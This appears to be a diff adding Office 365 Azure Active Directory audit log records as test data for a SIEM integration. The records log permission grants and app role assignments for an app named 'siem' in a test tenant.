+{"OrganizationId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "CreationTime": "2020-02-10T15:30:06", "Actor": [{"Type": 5, "ID": "asr@testsiem.onmicrosoft.com"}, {"Type": 3, "ID": "1003200096971F55"}, {"Type": 2, "ID": "18ed3507-a475-4ccb-b669-d66bc9f2a36e"}, {"Type": 2, "ID": "User_755e500a-6c03-46b0-b53b-282f23374e3b"}, {"Type": 2, "ID": "755e500a-6c03-46b0-b53b-282f23374e3b"}, {"Type": 2, "ID": "User"}], "Version": 1, "ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "RecordType": 8, "ActorIpAddress": "175.16.199.1", "UserId": "asr@testsiem.onmicrosoft.com", "UserType": 0, "UserKey": "1003200096971F55@testsiem.onmicrosoft.com", "ClientIP": "175.16.199.1", "SupportTicketId": "", "Workload": "AzureActiveDirectory", "Target": [{"Type": 2, "ID": "ServicePrincipal_98528ef9-e89b-469a-b19b-fa8e72a00fa6"}, {"Type": 2, "ID": "98528ef9-e89b-469a-b19b-fa8e72a00fa6"}, {"Type": 2, "ID": "ServicePrincipal"}, {"Type": 1, "ID": "Microsoft Graph"}, {"Type": 2, "ID": "00000003-0000-0000-c000-000000000000"}, {"Type": 4, "ID": "00000003-0000-0000-c000-000000000000/ags.windows.net;00000003-0000-0000-c000-000000000000;https://canary.graph.microsoft.com;https://graph.microsoft.com;https://ags.windows.net;https://graph.microsoft.us;https://graph.microsoft.com/;https://dod-graph.microsoft.us"}], "ObjectId": "00000003-0000-0000-c000-000000000000/ags.windows.net;00000003-0000-0000-c000-000000000000;https://canary.graph.microsoft.com;https://graph.microsoft.com;https://ags.windows.net;https://graph.microsoft.us;https://graph.microsoft.com/;https://dod-graph.microsoft.us", "ModifiedProperties": [{"Name": "ServicePrincipal.ObjectID", "OldValue": "", "NewValue": "5c242833-909c-4c6b-bca3-50feaaa98d23"}, {"Name": "ServicePrincipal.DisplayName", "OldValue": "", "NewValue": ""}, {"Name": "ServicePrincipal.AppId", "OldValue": "", "NewValue": ""}, {"Name": "ServicePrincipal.Name", "OldValue": "", "NewValue": ""}, {"NewValue": "00000003-0000-0000-c000-000000000000/ags.windows.net;00000003-0000-0000-c000-000000000000;https://canary.graph.microsoft.com;https://graph.microsoft.com;https://ags.windows.net;https://graph.microsoft.us;https://graph.microsoft.com/;https://dod-graph.microsoft.us", "OldValue": "", "Name": "TargetId.ServicePrincipalNames"}], "ResultStatus": "Success", "ExtendedProperties": [{"Name": "resultType", "Value": "Success"}, {"Name": "auditEventCategory", "Value": "ApplicationManagement"}, {"Name": "nCloud", "Value": "<null>"}, {"Name": "actorContextId", "Value": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd"}, {"Name": "actorObjectId", "Value": "755e500a-6c03-46b0-b53b-282f23374e3b"}, {"Name": "actorObjectClass", "Value": "User"}, {"Name": "actorUPN", "Value": "asr@testsiem.onmicrosoft.com"}, {"Name": "actorAppID", "Value": "18ed3507-a475-4ccb-b669-d66bc9f2a36e"}, {"Name": "actorPUID", "Value": "1003200096971F55"}, {"Name": "teamName", "Value": "MSODS."}, {"Name": "targetContextId", "Value": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd"}, {"Name": "targetObjectId", "Value": "98528ef9-e89b-469a-b19b-fa8e72a00fa6"}, {"Name": "extendedAuditEventCategory", "Value": "ServicePrincipal"}, {"Name": "targetSPN", "Value": "00000003-0000-0000-c000-000000000000/ags.windows.net;00000003-0000-0000-c000-000000000000;https://canary.graph.microsoft.com;https://graph.microsoft.com;https://ags.windows.net;https://graph.microsoft.us;https://graph.microsoft.com/;https://dod-graph.microsoft.us"}, {"Name": "targetName", "Value": "Microsoft Graph"}, {"Name": "targetIncludedUpdatedProperties", "Value": "[\"ServicePrincipal.ObjectID\",\"ServicePrincipal.DisplayName\",\"ServicePrincipal.AppId\",\"ServicePrincipal.Name\",\"TargetId.ServicePrincipalNames\"]"}, {"Name": "correlationId", "Value": "654d7080-aee6-4826-abd9-c5710b336614"}, {"Name": "version", "Value": "2"}, {"Name": "additionalTargets", "Value": "[{\"ObjectID\":\"5c242833-909c-4c6b-bca3-50feaaa98d23\",\"DisplayName\":null,\"ObjectClass\":\"ServicePrincipal\",\"AppId\":null,\"Name\":null}]"}, {"Name": "additionalDetails", "Value": "{\"User-Agent\":\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\"}"}, {"Name": "env_ver", "Value": "2.1"}, {"Name": "env_name", "Value": "#Ifx.AuditSchema#IfxMsods.AuditCommonEvent"}, {"Name": "env_time", "Value": "2020-02-10T15:30:06.3343965Z"}, {"Name": "env_epoch", "Value": "38FW7"}, {"Name": "env_seqNum", "Value": "43118019"}, {"Name": "env_popSample", "Value": "0"}, {"Name": "env_iKey", "Value": "ikey"}, {"Name": "env_flags", "Value": "257"}, {"Name": "env_cv", "Value": "##eb6f4dc6-03bb-4c63-9cab-f08dd1f79c78_00000000-0000-0000-0000-000000000000_eb6f4dc6-03bb-4c63-9cab-f08dd1f79c78"}, {"Name": "env_os", "Value": "<null>"}, {"Name": "env_osVer", "Value": "<null>"}, {"Name": "env_appId", "Value": "restdirectoryservice"}, {"Name": "env_appVer", "Value": "1.0.11737.0"}, {"Name": "env_cloud_ver", "Value": "1.0"}, {"Name": "env_cloud_name", "Value": "MSO-AM5R"}, {"Name": "env_cloud_role", "Value": "restdirectoryservice"}, {"Name": "env_cloud_roleVer", "Value": "1.0.11737.0"}, {"Name": "env_cloud_roleInstance", "Value": "AM5RRDSR57"}, {"Name": "env_cloud_environment", "Value": "PROD"}, {"Name": "env_cloud_deploymentUnit", "Value": "R5"}], "TargetContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "AzureActiveDirectoryEventType": 1, "Operation": "Add OAuth2PermissionGrant.", "Id": "ad12e6ca-cb87-4bc5-8103-dbc83cb9a4f8"}
+{"OrganizationId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "CreationTime": "2020-02-10T15:30:06", "Actor": [{"Type": 5, "ID": "asr@testsiem.onmicrosoft.com"}, {"Type": 3, "ID": "1003200096971F55"}, {"Type": 2, "ID": "18ed3507-a475-4ccb-b669-d66bc9f2a36e"}, {"Type": 2, "ID": "User_755e500a-6c03-46b0-b53b-282f23374e3b"}, {"Type": 2, "ID": "755e500a-6c03-46b0-b53b-282f23374e3b"}, {"Type": 2, "ID": "User"}], "Version": 1, "ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "RecordType": 8, "ActorIpAddress": "175.16.199.1", "UserId": "asr@testsiem.onmicrosoft.com", "UserType": 0, "UserKey": "1003200096971F55@testsiem.onmicrosoft.com", "ClientIP": "175.16.199.1", "SupportTicketId": "", "Workload": "AzureActiveDirectory", "Target": [{"Type": 2, "ID": "ServicePrincipal_98528ef9-e89b-469a-b19b-fa8e72a00fa6"}, {"Type": 2, "ID": "98528ef9-e89b-469a-b19b-fa8e72a00fa6"}, {"Type": 2, "ID": "ServicePrincipal"}, {"Type": 1, "ID": "Microsoft Graph"}, {"Type": 2, "ID": "00000003-0000-0000-c000-000000000000"}, {"Type": 4, "ID": "00000003-0000-0000-c000-000000000000/ags.windows.net;00000003-0000-0000-c000-000000000000;https://canary.graph.microsoft.com;https://graph.microsoft.com;https://ags.windows.net;https://graph.microsoft.us;https://graph.microsoft.com/;https://dod-graph.microsoft.us"}], "ObjectId": "00000003-0000-0000-c000-000000000000/ags.windows.net;00000003-0000-0000-c000-000000000000;https://canary.graph.microsoft.com;https://graph.microsoft.com;https://ags.windows.net;https://graph.microsoft.us;https://graph.microsoft.com/;https://dod-graph.microsoft.us", "ModifiedProperties": [{"Name": "ServicePrincipal.ObjectID", "OldValue": "", "NewValue": "5c242833-909c-4c6b-bca3-50feaaa98d23"}, {"NewValue": "", "OldValue": "", "Name": "ServicePrincipal.DisplayName"}, {"Name": "ServicePrincipal.AppId", "OldValue": "", "NewValue": ""}, {"Name": "ServicePrincipal.Name", "OldValue": "", "NewValue": ""}, {"Name": "TargetId.ServicePrincipalNames", "OldValue": "", "NewValue": "00000003-0000-0000-c000-000000000000/ags.windows.net;00000003-0000-0000-c000-000000000000;https://canary.graph.microsoft.com;https://graph.microsoft.com;https://ags.windows.net;https://graph.microsoft.us;https://graph.microsoft.com/;https://dod-graph.microsoft.us"}], "ResultStatus": "Success", "ExtendedProperties": [{"Name": "resultType", "Value": "Success"}, {"Name": "auditEventCategory", "Value": "ApplicationManagement"}, {"Name": "nCloud", "Value": "<null>"}, {"Name": "actorContextId", "Value": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd"}, {"Name": "actorObjectId", "Value": "755e500a-6c03-46b0-b53b-282f23374e3b"}, {"Name": "actorObjectClass", "Value": "User"}, {"Name": "actorUPN", "Value": "asr@testsiem.onmicrosoft.com"}, {"Name": "actorAppID", "Value": "18ed3507-a475-4ccb-b669-d66bc9f2a36e"}, {"Name": "actorPUID", "Value": "1003200096971F55"}, {"Name": "teamName", "Value": "MSODS."}, {"Name": "targetContextId", "Value": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd"}, {"Name": "targetObjectId", "Value": "98528ef9-e89b-469a-b19b-fa8e72a00fa6"}, {"Name": "extendedAuditEventCategory", "Value": "ServicePrincipal"}, {"Name": "targetSPN", "Value": "00000003-0000-0000-c000-000000000000/ags.windows.net;00000003-0000-0000-c000-000000000000;https://canary.graph.microsoft.com;https://graph.microsoft.com;https://ags.windows.net;https://graph.microsoft.us;https://graph.microsoft.com/;https://dod-graph.microsoft.us"}, {"Name": "targetName", "Value": "Microsoft Graph"}, {"Name": "targetIncludedUpdatedProperties", "Value": "[\"ServicePrincipal.ObjectID\",\"ServicePrincipal.DisplayName\",\"ServicePrincipal.AppId\",\"ServicePrincipal.Name\",\"TargetId.ServicePrincipalNames\"]"}, {"Name": "correlationId", "Value": "654d7080-aee6-4826-abd9-c5710b336614"}, {"Name": "version", "Value": "2"}, {"Name": "additionalTargets", "Value": "[{\"ObjectID\":\"5c242833-909c-4c6b-bca3-50feaaa98d23\",\"DisplayName\":null,\"ObjectClass\":\"ServicePrincipal\",\"AppId\":null,\"Name\":null}]"}, {"Name": "additionalDetails", "Value": "{\"User-Agent\":\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\"}"}, {"Name": "env_ver", "Value": "2.1"}, {"Name": "env_name", "Value": "#Ifx.AuditSchema#IfxMsods.AuditCommonEvent"}, {"Name": "env_time", "Value": "2020-02-10T15:30:06.3343965Z"}, {"Name": "env_epoch", "Value": "38FW7"}, {"Name": "env_seqNum", "Value": "43118019"}, {"Name": "env_popSample", "Value": "0"}, {"Name": "env_iKey", "Value": "ikey"}, {"Name": "env_flags", "Value": "257"}, {"Name": "env_cv", "Value": "##eb6f4dc6-03bb-4c63-9cab-f08dd1f79c78_00000000-0000-0000-0000-000000000000_eb6f4dc6-03bb-4c63-9cab-f08dd1f79c78"}, {"Name": "env_os", "Value": "<null>"}, {"Name": "env_osVer", "Value": "<null>"}, {"Name": "env_appId", "Value": "restdirectoryservice"}, {"Name": "env_appVer", "Value": "1.0.11737.0"}, {"Name": "env_cloud_ver", "Value": "1.0"}, {"Name": "env_cloud_name", "Value": "MSO-AM5R"}, {"Name": "env_cloud_role", "Value": "restdirectoryservice"}, {"Name": "env_cloud_roleVer", "Value": "1.0.11737.0"}, {"Name": "env_cloud_roleInstance", "Value": "AM5RRDSR57"}, {"Name": "env_cloud_environment", "Value": "PROD"}, {"Name": "env_cloud_deploymentUnit", "Value": "R5"}], "TargetContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "AzureActiveDirectoryEventType": 1, "Operation": "Add OAuth2PermissionGrant.", "Id": "ad12e6ca-cb87-4bc5-8103-dbc83cb9a4f8"}
+{"OrganizationId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "CreationTime": "2020-02-10T15:30:06", "Actor": [{"Type": 5, "ID": "asr@testsiem.onmicrosoft.com"}, {"Type": 3, "ID": "1003200096971F55"}, {"Type": 2, "ID": "18ed3507-a475-4ccb-b669-d66bc9f2a36e"}, {"Type": 2, "ID": "User_755e500a-6c03-46b0-b53b-282f23374e3b"}, {"Type": 2, "ID": "755e500a-6c03-46b0-b53b-282f23374e3b"}, {"Type": 2, "ID": "User"}], "Version": 1, "ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "RecordType": 8, "ActorIpAddress": "175.16.199.1", "UserId": "asr@testsiem.onmicrosoft.com", "UserType": 0, "UserKey": "1003200096971F55@testsiem.onmicrosoft.com", "ClientIP": "175.16.199.1", "SupportTicketId": "", "Workload": "AzureActiveDirectory", "Target": [{"Type": 2, "ID": "ServicePrincipal_98528ef9-e89b-469a-b19b-fa8e72a00fa6"}, {"Type": 2, "ID": "98528ef9-e89b-469a-b19b-fa8e72a00fa6"}, {"Type": 2, "ID": "ServicePrincipal"}, {"Type": 1, "ID": "Microsoft Graph"}, {"Type": 2, "ID": "00000003-0000-0000-c000-000000000000"}, {"Type": 4, "ID": "00000003-0000-0000-c000-000000000000/ags.windows.net;00000003-0000-0000-c000-000000000000;https://canary.graph.microsoft.com;https://graph.microsoft.com;https://ags.windows.net;https://graph.microsoft.us;https://graph.microsoft.com/;https://dod-graph.microsoft.us"}], "ObjectId": "00000003-0000-0000-c000-000000000000/ags.windows.net;00000003-0000-0000-c000-000000000000;https://canary.graph.microsoft.com;https://graph.microsoft.com;https://ags.windows.net;https://graph.microsoft.us;https://graph.microsoft.com/;https://dod-graph.microsoft.us", "ModifiedProperties": [{"NewValue": "5c242833-909c-4c6b-bca3-50feaaa98d23", "OldValue": "", "Name": "ServicePrincipal.ObjectID"}, {"Name": "ServicePrincipal.DisplayName", "OldValue": "", "NewValue": ""}, {"NewValue": "", "OldValue": "", "Name": "ServicePrincipal.AppId"}, {"Name": "ServicePrincipal.Name", "OldValue": "", "NewValue": ""}, {"NewValue": "00000003-0000-0000-c000-000000000000/ags.windows.net;00000003-0000-0000-c000-000000000000;https://canary.graph.microsoft.com;https://graph.microsoft.com;https://ags.windows.net;https://graph.microsoft.us;https://graph.microsoft.com/;https://dod-graph.microsoft.us", "OldValue": "", "Name": "TargetId.ServicePrincipalNames"}], "ResultStatus": "Success", "ExtendedProperties": [{"Name": "resultType", "Value": "Success"}, {"Name": "auditEventCategory", "Value": "ApplicationManagement"}, {"Name": "nCloud", "Value": "<null>"}, {"Name": "actorContextId", "Value": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd"}, {"Name": "actorObjectId", "Value": "755e500a-6c03-46b0-b53b-282f23374e3b"}, {"Name": "actorObjectClass", "Value": "User"}, {"Name": "actorUPN", "Value": "asr@testsiem.onmicrosoft.com"}, {"Name": "actorAppID", "Value": "18ed3507-a475-4ccb-b669-d66bc9f2a36e"}, {"Name": "actorPUID", "Value": "1003200096971F55"}, {"Name": "teamName", "Value": "MSODS."}, {"Name": "targetContextId", "Value": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd"}, {"Name": "targetObjectId", "Value": "98528ef9-e89b-469a-b19b-fa8e72a00fa6"}, {"Name": "extendedAuditEventCategory", "Value": "ServicePrincipal"}, {"Name": "targetSPN", "Value": "00000003-0000-0000-c000-000000000000/ags.windows.net;00000003-0000-0000-c000-000000000000;https://canary.graph.microsoft.com;https://graph.microsoft.com;https://ags.windows.net;https://graph.microsoft.us;https://graph.microsoft.com/;https://dod-graph.microsoft.us"}, {"Name": "targetName", "Value": "Microsoft Graph"}, {"Name": "targetIncludedUpdatedProperties", "Value": "[\"ServicePrincipal.ObjectID\",\"ServicePrincipal.DisplayName\",\"ServicePrincipal.AppId\",\"ServicePrincipal.Name\",\"TargetId.ServicePrincipalNames\"]"}, {"Name": "correlationId", "Value": "654d7080-aee6-4826-abd9-c5710b336614"}, {"Name": "version", "Value": "2"}, {"Name": "additionalTargets", "Value": "[{\"ObjectID\":\"5c242833-909c-4c6b-bca3-50feaaa98d23\",\"DisplayName\":null,\"ObjectClass\":\"ServicePrincipal\",\"AppId\":null,\"Name\":null}]"}, {"Name": "additionalDetails", "Value": "{\"User-Agent\":\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\"}"}, {"Name": "env_ver", "Value": "2.1"}, {"Name": "env_name", "Value": "#Ifx.AuditSchema#IfxMsods.AuditCommonEvent"}, {"Name": "env_time", "Value": "2020-02-10T15:30:06.3343965Z"}, {"Name": "env_epoch", "Value": "38FW7"}, {"Name": "env_seqNum", "Value": "43118019"}, {"Name": "env_popSample", "Value": "0"}, {"Name": "env_iKey", "Value": "ikey"}, {"Name": "env_flags", "Value": "257"}, {"Name": "env_cv", "Value": "##eb6f4dc6-03bb-4c63-9cab-f08dd1f79c78_00000000-0000-0000-0000-000000000000_eb6f4dc6-03bb-4c63-9cab-f08dd1f79c78"}, {"Name": "env_os", "Value": "<null>"}, {"Name": "env_osVer", "Value": "<null>"}, {"Name": "env_appId", "Value": "restdirectoryservice"}, {"Name": "env_appVer", "Value": "1.0.11737.0"}, {"Name": "env_cloud_ver", "Value": "1.0"}, {"Name": "env_cloud_name", "Value": "MSO-AM5R"}, {"Name": "env_cloud_role", "Value": "restdirectoryservice"}, {"Name": "env_cloud_roleVer", "Value": "1.0.11737.0"}, {"Name": "env_cloud_roleInstance", "Value": "AM5RRDSR57"}, {"Name": "env_cloud_environment", "Value": "PROD"}, {"Name": "env_cloud_deploymentUnit", "Value": "R5"}], "TargetContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "AzureActiveDirectoryEventType": 1, "Operation": "Add OAuth2PermissionGrant.", "Id": "ad12e6ca-cb87-4bc5-8103-dbc83cb9a4f8"}
+{"OrganizationId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "CreationTime": "2020-02-10T15:30:06", "Actor": [{"Type": 5, "ID": "asr@testsiem.onmicrosoft.com"}, {"Type": 3, "ID": "1003200096971F55"}, {"Type": 2, "ID": "18ed3507-a475-4ccb-b669-d66bc9f2a36e"}, {"Type": 2, "ID": "User_755e500a-6c03-46b0-b53b-282f23374e3b"}, {"Type": 2, "ID": "755e500a-6c03-46b0-b53b-282f23374e3b"}, {"Type": 2, "ID": "User"}], "Version": 1, "ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "RecordType": 8, "ActorIpAddress": "175.16.199.1", "UserId": "asr@testsiem.onmicrosoft.com", "UserType": 0, "UserKey": "1003200096971F55@testsiem.onmicrosoft.com", "ClientIP": "175.16.199.1", "SupportTicketId": "", "Workload": "AzureActiveDirectory", "Target": [{"Type": 2, "ID": "ServicePrincipal_efe101d0-818a-4f19-b2f8-53186f8218ad"}, {"Type": 2, "ID": "efe101d0-818a-4f19-b2f8-53186f8218ad"}, {"Type": 2, "ID": "ServicePrincipal"}, {"Type": 1, "ID": "Office 365 Management APIs"}, {"Type": 2, "ID": "c5393580-f805-4401-95e8-94b7a6ef2fc2"}, {"Type": 4, "ID": "c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com"}], "ObjectId": "c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com", "ModifiedProperties": [{"Name": "ServicePrincipal.ObjectID", "OldValue": "", "NewValue": "5c242833-909c-4c6b-bca3-50feaaa98d23"}, {"Name": "ServicePrincipal.DisplayName", "OldValue": "", "NewValue": "siem"}, {"Name": "ServicePrincipal.AppId", "OldValue": "", "NewValue": "71a0194b-b70c-44a6-82f2-d4670aee4585"}, {"Name": "ServicePrincipal.Name", "OldValue": "", "NewValue": "71a0194b-b70c-44a6-82f2-d4670aee4585"}, {"Name": "TargetId.ServicePrincipalNames", "OldValue": "", "NewValue": "c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com"}], "ResultStatus": "Success", "ExtendedProperties": [{"Name": "resultType", "Value": "Success"}, {"Name": "auditEventCategory", "Value": "ApplicationManagement"}, {"Name": "nCloud", "Value": "<null>"}, {"Name": "actorContextId", "Value": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd"}, {"Name": "actorObjectId", "Value": "755e500a-6c03-46b0-b53b-282f23374e3b"}, {"Name": "actorObjectClass", "Value": "User"}, {"Name": "actorUPN", "Value": "asr@testsiem.onmicrosoft.com"}, {"Name": "actorAppID", "Value": "18ed3507-a475-4ccb-b669-d66bc9f2a36e"}, {"Name": "actorPUID", "Value": "1003200096971F55"}, {"Name": "teamName", "Value": "MSODS."}, {"Name": "targetContextId", "Value": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd"}, {"Name": "targetObjectId", "Value": "efe101d0-818a-4f19-b2f8-53186f8218ad"}, {"Name": "extendedAuditEventCategory", "Value": "ServicePrincipal"}, {"Name": "targetSPN", "Value": "c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com"}, {"Name": "targetName", "Value": "Office 365 Management APIs"}, {"Name": "targetIncludedUpdatedProperties", "Value": "[\"ServicePrincipal.ObjectID\",\"ServicePrincipal.DisplayName\",\"ServicePrincipal.AppId\",\"ServicePrincipal.Name\",\"TargetId.ServicePrincipalNames\"]"}, {"Name": "correlationId", "Value": "654d7080-aee6-4826-abd9-c5710b336614"}, {"Name": "version", "Value": "2"}, {"Name": "additionalTargets", "Value": "[{\"ObjectID\":\"5c242833-909c-4c6b-bca3-50feaaa98d23\",\"DisplayName\":\"siem\",\"ObjectClass\":\"ServicePrincipal\",\"AppId\":\"71a0194b-b70c-44a6-82f2-d4670aee4585\",\"Name\":\"71a0194b-b70c-44a6-82f2-d4670aee4585\"}]"}, {"Name": "additionalDetails", "Value": "{\"User-Agent\":\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\"}"}, {"Name": "env_ver", "Value": "2.1"}, {"Name": "env_name", "Value": "#Ifx.AuditSchema#IfxMsods.AuditCommonEvent"}, {"Name": "env_time", "Value": "2020-02-10T15:30:06.1843731Z"}, {"Name": "env_epoch", "Value": "38FW7"}, {"Name": "env_seqNum", "Value": "43117912"}, {"Name": "env_popSample", "Value": "0"}, {"Name": "env_iKey", "Value": "ikey"}, {"Name": "env_flags", "Value": "257"}, {"Name": "env_cv", "Value": "##eb6f4dc6-03bb-4c63-9cab-f08dd1f79c78_00000000-0000-0000-0000-000000000000_eb6f4dc6-03bb-4c63-9cab-f08dd1f79c78"}, {"Name": "env_os", "Value": "<null>"}, {"Name": "env_osVer", "Value": "<null>"}, {"Name": "env_appId", "Value": "restdirectoryservice"}, {"Name": "env_appVer", "Value": "1.0.11737.0"}, {"Name": "env_cloud_ver", "Value": "1.0"}, {"Name": "env_cloud_name", "Value": "MSO-AM5R"}, {"Name": "env_cloud_role", "Value": "restdirectoryservice"}, {"Name": "env_cloud_roleVer", "Value": "1.0.11737.0"}, {"Name": "env_cloud_roleInstance", "Value": "AM5RRDSR57"}, {"Name": "env_cloud_environment", "Value": "PROD"}, {"Name": "env_cloud_deploymentUnit", "Value": "R5"}], "TargetContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "AzureActiveDirectoryEventType": 1, "Operation": "Add app role assignment to service principal.", "Id": "678f80a3-92c4-4bb6-83a1-1c39d5a87225"}
+{"OrganizationId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "CreationTime": "2020-02-10T15:30:06", "Actor": [{"Type": 5, "ID": "asr@testsiem.onmicrosoft.com"}, {"Type": 3, "ID": "1003200096971F55"}, {"Type": 2, "ID": "18ed3507-a475-4ccb-b669-d66bc9f2a36e"}, {"Type": 2, "ID": "User_755e500a-6c03-46b0-b53b-282f23374e3b"}, {"Type": 2, "ID": "755e500a-6c03-46b0-b53b-282f23374e3b"}, {"Type": 2, "ID": "User"}], "Version": 1, "ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "RecordType": 8, "ActorIpAddress": "175.16.199.1", "UserId": "asr@testsiem.onmicrosoft.com", "UserType": 0, "UserKey": "1003200096971F55@testsiem.onmicrosoft.com", "ClientIP": "175.16.199.1", "SupportTicketId": "", "Workload": "AzureActiveDirectory", "Target": [{"Type": 2, "ID": "ServicePrincipal_efe101d0-818a-4f19-b2f8-53186f8218ad"}, {"Type": 2, "ID": "efe101d0-818a-4f19-b2f8-53186f8218ad"}, {"Type": 2, "ID": "ServicePrincipal"}, {"Type": 1, "ID": "Office 365 Management APIs"}, {"Type": 2, "ID": "c5393580-f805-4401-95e8-94b7a6ef2fc2"}, {"Type": 4, "ID": "c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com"}], "ObjectId": "c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com", "ModifiedProperties": [{"Name": "ServicePrincipal.ObjectID", "OldValue": "", "NewValue": "5c242833-909c-4c6b-bca3-50feaaa98d23"}, {"Name": "ServicePrincipal.DisplayName", "OldValue": "", "NewValue": "siem"}, {"Name": "ServicePrincipal.AppId", "OldValue": "", "NewValue": "71a0194b-b70c-44a6-82f2-d4670aee4585"}, {"Name": "ServicePrincipal.Name", "OldValue": "", "NewValue": "71a0194b-b70c-44a6-82f2-d4670aee4585"}, {"Name": "TargetId.ServicePrincipalNames", "OldValue": "", "NewValue": "c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com"}], "ResultStatus": "Success", "ExtendedProperties": [{"Name": "resultType", "Value": "Success"}, {"Name": "auditEventCategory", "Value": "ApplicationManagement"}, {"Name": "nCloud", "Value": "<null>"}, {"Name": "actorContextId", "Value": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd"}, {"Name": "actorObjectId", "Value": "755e500a-6c03-46b0-b53b-282f23374e3b"}, {"Name": "actorObjectClass", "Value": "User"}, {"Name": "actorUPN", "Value": "asr@testsiem.onmicrosoft.com"}, {"Name": "actorAppID", "Value": "18ed3507-a475-4ccb-b669-d66bc9f2a36e"}, {"Name": "actorPUID", "Value": "1003200096971F55"}, {"Name": "teamName", "Value": "MSODS."}, {"Name": "targetContextId", "Value": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd"}, {"Name": "targetObjectId", "Value": "efe101d0-818a-4f19-b2f8-53186f8218ad"}, {"Name": "extendedAuditEventCategory", "Value": "ServicePrincipal"}, {"Name": "targetSPN", "Value": "c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com"}, {"Name": "targetName", "Value": "Office 365 Management APIs"}, {"Name": "targetIncludedUpdatedProperties", "Value": "[\"ServicePrincipal.ObjectID\",\"ServicePrincipal.DisplayName\",\"ServicePrincipal.AppId\",\"ServicePrincipal.Name\",\"TargetId.ServicePrincipalNames\"]"}, {"Name": "correlationId", "Value": "654d7080-aee6-4826-abd9-c5710b336614"}, {"Name": "version", "Value": "2"}, {"Name": "additionalTargets", "Value": "[{\"ObjectID\":\"5c242833-909c-4c6b-bca3-50feaaa98d23\",\"DisplayName\":\"siem\",\"ObjectClass\":\"ServicePrincipal\",\"AppId\":\"71a0194b-b70c-44a6-82f2-d4670aee4585\",\"Name\":\"71a0194b-b70c-44a6-82f2-d4670aee4585\"}]"}, {"Name": "additionalDetails", "Value": "{\"User-Agent\":\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\"}"}, {"Name": "env_ver", "Value": "2.1"}, {"Name": "env_name", "Value": "#Ifx.AuditSchema#IfxMsods.AuditCommonEvent"}, {"Name": "env_time", "Value": "2020-02-10T15:30:06.2593808Z"}, {"Name": "env_epoch", "Value": "38FW7"}, {"Name": "env_seqNum", "Value": "43117959"}, {"Name": "env_popSample", "Value": "0"}, {"Name": "env_iKey", "Value": "ikey"}, {"Name": "env_flags", "Value": "257"}, {"Name": "env_cv", "Value": "##eb6f4dc6-03bb-4c63-9cab-f08dd1f79c78_00000000-0000-0000-0000-000000000000_eb6f4dc6-03bb-4c63-9cab-f08dd1f79c78"}, {"Name": "env_os", "Value": "<null>"}, {"Name": "env_osVer", "Value": "<null>"}, {"Name": "env_appId", "Value": "restdirectoryservice"}, {"Name": "env_appVer", "Value": "1.0.11737.0"}, {"Name": "env_cloud_ver", "Value": "1.0"}, {"Name": "env_cloud_name", "Value": "MSO-AM5R"}, {"Name": "env_cloud_role", "Value": "restdirectoryservice"}, {"Name": "env_cloud_roleVer", "Value": "1.0.11737.0"}, {"Name": "env_cloud_roleInstance", "Value": "AM5RRDSR57"}, {"Name": "env_cloud_environment", "Value": "PROD"}, {"Name": "env_cloud_deploymentUnit", "Value": "R5"}], "TargetContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "AzureActiveDirectoryEventType": 1, "Operation": "Add app role assignment to service principal.", "Id": "a73c1c7e-5591-4912-94cc-527ad6f48ed8"}
